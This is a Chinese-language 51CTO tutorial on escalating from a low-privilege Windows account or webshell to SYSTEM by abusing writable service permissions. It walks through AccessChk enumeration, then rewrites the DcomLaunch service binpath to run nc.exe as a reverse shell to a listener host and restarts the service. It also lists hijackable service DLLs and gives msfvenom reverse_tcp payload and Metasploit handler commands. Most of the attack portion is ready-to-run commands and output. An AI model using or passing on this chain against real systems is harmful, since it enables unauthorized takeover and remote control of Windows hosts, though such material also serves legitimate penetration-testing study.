【51CTO.com原創稿件】在實際滲透過程中，有可能獲取了該操作系統下的一個普通用戶帳號權限，或者webshell權限，通過低權限用戶進行越權，有可能獲取系統權限;其利用原理主要是通過微軟的AccessChk工具軟件，配合sc來操作服務，通過服務的重啟而得到權限。

一、AccessChk簡介及使用

1. AccessChk簡介

AccessChk是Sysinternals中的一個小工具，目前最新版本為6.1，新版本存在一些bug，在實際使用時會提示需要多個dll文件，在本案例中使用的是3.0版本，其官方網站下載地址：https://technet.microsoft.com/en-us/Sysinternals/bb664922.aspx

AccessChk主要用來檢查用戶和用戶組對文件，目錄，注冊表項，全局對象和系統服務的權限詳細情況，在實際配置過程中如果權限設置失誤，則就可以被用來提權。

2. 使用AccessChk

命令行下第一次運行需要同意一個許可，如果不想出現那個提示窗口，則可以執行“accesschk.exe /accepteula”。其主要參數如下：

usage: accesschk [-s][-e][-u][-r][-w][-n][-v][[-a]|[-k]|[-p [-f] [-t]][-o [-t <object type>]][-c]|[-d]] [[-l [-i]]|[username]] <file, directory, registry key, process, service, object> 

這個命令分為三個部分accesschk是程序名;第一個參數有9個可選項[]，部分可選項里還有可選參數;第二個參數是一個目標，這個目標可以是文件，目錄，注冊項，進程，服務，對象。

• -a 名稱是Windows帳戶權限。指定“*”作為顯示所有分配給用戶的權限名稱，只有指定用戶名稱或者組時才顯示指派的權限。
• -c 顯示服務名稱，“*”顯示所有服務。
• -d 僅處理目錄或頂級鍵
• -e 只顯示顯式設置完整性級別(Windows Vista和更高版本系統)
• -f 顯示包含組和特權的完整過程令牌信息
• -k 注冊表鍵值，例如 hklm\software
• -i 在取消完全訪問控制列表時忽略只繼承繼承符的對象
• -l 顯示全部訪問控制列表。添加“-I”忽略繼承ACEs
• -n 僅顯示沒有訪問權限的對象
• -o 名稱是對象管理器命名空間中的一個對象(默認是root)。查看一個目錄的內容，用反斜線或-S-T和對象類型指定名稱
• -p 進程名或者PID，例如cmd.exe (使用 '*'顯示所有的進程). 加“-f ”顯示包括組和特權的所有進程令牌信息，加“-t”顯示線程。
• -q 省略標識
• -r 顯示對象只讀屬性
• -s 遞歸
• -t 對象類型篩選器
• -u 抑制錯誤
• -v 冗長(包括Windows Vista完整性級別)
• -w 僅顯示具有寫訪問的對象

(1)查看用戶服務，查看管理員組、users組下所有服務：

accesschk administrators -c * 
accesschk users -c * 

如圖1所示，可以對某個用戶進行查看，主要用來提權用，例如查看simeon用戶具備讀寫服務器權限：

accesschk simeon -c * | find "RW" 或者accesschk simeon -cw *

圖1查看指定用戶的服務權限

(2)查看用戶組對系統服務具備寫權限，如果有則會顯示，否則會提示“No matching objects found”。

accesschk.exe -uwcqv "Authenticated Users" * 
accesschk.exe -uwcqv "Administrators" * 
accesschk.exe -uwcqv "Backup Operators" * 
accesschk.exe -uwcqv "Distributed COM Users" * 
accesschk.exe -uwcqv "Guests" * 
accesschk.exe -uwcqv "HelpServicesGroup" * 
accesschk.exe -uwcqv "IIS_WPG" * 
accesschk.exe -uwcqv "Network Configuration Operators" * 
accesschk.exe -uwcqv "Performance Monitor Users" * 
accesschk.exe -uwcqv "Performance Log Users" * 
accesschk.exe -uwcqv "Power Users" * 
accesschk.exe -uwcqv "Print Operators" * 
accesschk.exe -uwcqv "Remote Desktop Users" * 
accesschk.exe -uwcqv "Replicator" * 
accesschk.exe -uwcqv "TelnetClients" * 
accesschk.exe -uwcqv "Users" * 

二、獲取低權限可操作服務名稱

1. 實驗環境

(1)本次實驗環境為Windows 2003 Sever SP3，用戶simeon屬于power user組，可以登錄系統。

(2)IP地址：192.168.52.175

(3)監聽服務IP：192.168.52.215

(4)nc.exe復制到c:\windows\temp目錄

2. 獲取可讀寫的服務

執行命令以下命令獲取Power Users組可以操作的服務名稱信息，如圖2所示。

accesschk.exe -uwcqv "Power Users" * 

執行后顯示結果如下：

RW DcomLaunch 
        SERVICE_QUERY_STATUS 
        SERVICE_QUERY_CONFIG 
        SERVICE_CHANGE_CONFIG 
        SERVICE_INTERROGATE 
        SERVICE_ENUMERATE_DEPENDENTS 
        READ_CONTROL 
RW kdc 
        SERVICE_QUERY_STATUS 
        SERVICE_QUERY_CONFIG 
        SERVICE_CHANGE_CONFIG 
        SERVICE_INTERROGATE 
        SERVICE_ENUMERATE_DEPENDENTS 
        READ_CONTROL 

圖2獲取可讀寫的服務名稱信息

3. 查詢服務詳細信息

服務名稱為“DcomLaunch”、“kdc”可以被simeon用戶進行操作。使用sc qc kdc命令查詢kdc服務的詳細信息，如圖3所示，可以看到該服務是以系統權限運行的。

圖3查詢kdc服務詳細信息

4 .決定使用那個服務

執行命令“net start”查看系統目前已經啟動的服務，也可以使用以下命令直接獲取。如圖4所示，在啟動服務列表中發現“DCOM Server Process Launcher”服務名稱。

net start | find "DCOM Server Process Launcher"  
net start | find "Kerberos Key Distribution Center" 

圖4獲取服務名稱

5. 獲取服務名稱對應的服務

使用命令“tasklist /svc”，如圖5所示，獲取“DCOM Server Process Launcher”服務名稱所對應的服務“DcomLaunch”。

圖5獲取DcomLaunch服務信息

三、修改服務并獲取系統權限

1. 修改服務參數binpath值

使用sc命令對服務進行修改：

sc config DcomLaunch binpath= "C:\windows\temp\nc.exe -nv 192.168.52.215 4433 -e C:\WINDOWS\System32\cmd.exe" 

如圖6所示，執行命令后，顯示修改服務配置成功，再次使用sc qc DcomLaunch，顯示執行文件已經更改為：

C:\windows\temp\nc.exe -nv 192.168.52.215 4433 -e C:\WINDOWS\System32\cmd.exe 

查詢服務：sc qc DcomLaunch

圖6修改服務binpath值

2. 啟動服務

先執行 sc config DcomLaunch obj= ".\LocalSystem" password= ""，然后通過命令下啟動，使用“net start DcomLaunch”命令，也可以通過services.msc服務管理器重啟該服務，如圖7所示。

圖7重新啟動服務

3. 反彈獲取服務器權限

如圖8所示，在反彈服務器中192.168.52.215監聽4433端口，成功獲取來自192.168.52.175的反彈，且為系統權限。

圖8反彈獲取系統權限

4. 總結

在Winxp、Windows 2003、Windows 7 (32/64)下有一些dll文件也可以被替換：

IKE and AuthIP IPsec Keying Modules (IKEEXT)    – wlbsctrl.dll 
Windows Media Center Receiver Service (ehRecvr)    – ehETW.dll 
Windows Media Center Scheduler Service (ehSched)  – ehETW.dll 
Automatic Updates (wuauserv)    – ifsproxy.dll 
Remote Desktop Help Session Manager (RDSessMgr)–SalemHook.dll 
Remote Access Connection Manager (RasMan)   – ipbootp.dll 
Windows Management Instrumentation (winmgmt)    – wbemcore.dll 
Audio Service (STacSV)    – SFFXComm.dll SFCOM.DLL  
Intel(R) Rapid Storage Technology (IAStorDataMgrSvc)  – DriverSim.dll 
Juniper Unified Network Service(JuniperAccessService) – dsLogService.dll 

(1)使用msf生成exe文件

Linux msf監聽4433端口

./msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.52.215 lport=4433 -f exe -o /tmp/my_payload.exe 

windows下監聽4433端口

./msfvenom -p windows/shel/reverse_tcp lhost=192.168.52.215 lport=4433 -f exe -o /tmp/w.exe 

其中平臺參數(-p)可以設置為以下的一些，也可以使用msfvenom -l payload | grep 'reverse'進行查看和選擇：

windows/shell/reverse_tcp 
windows/x64/shell_reverse_tcp 
windows/shell_reverse_tcp 
windows/shell/reverse_tcp 

(2)在msf上面執行

set payload windows/meterpreter/reverse_tcp 
show options 
set lhost 192.168.52.215 
set lport 4433 
run 0 

(3)將生成的/tmp/my_payload.exe按照本文上面的方法執行后即可得到反彈的webshell

【51CTO原創稿件，合作站點轉載請注明原文作者和出處為51CTO.com】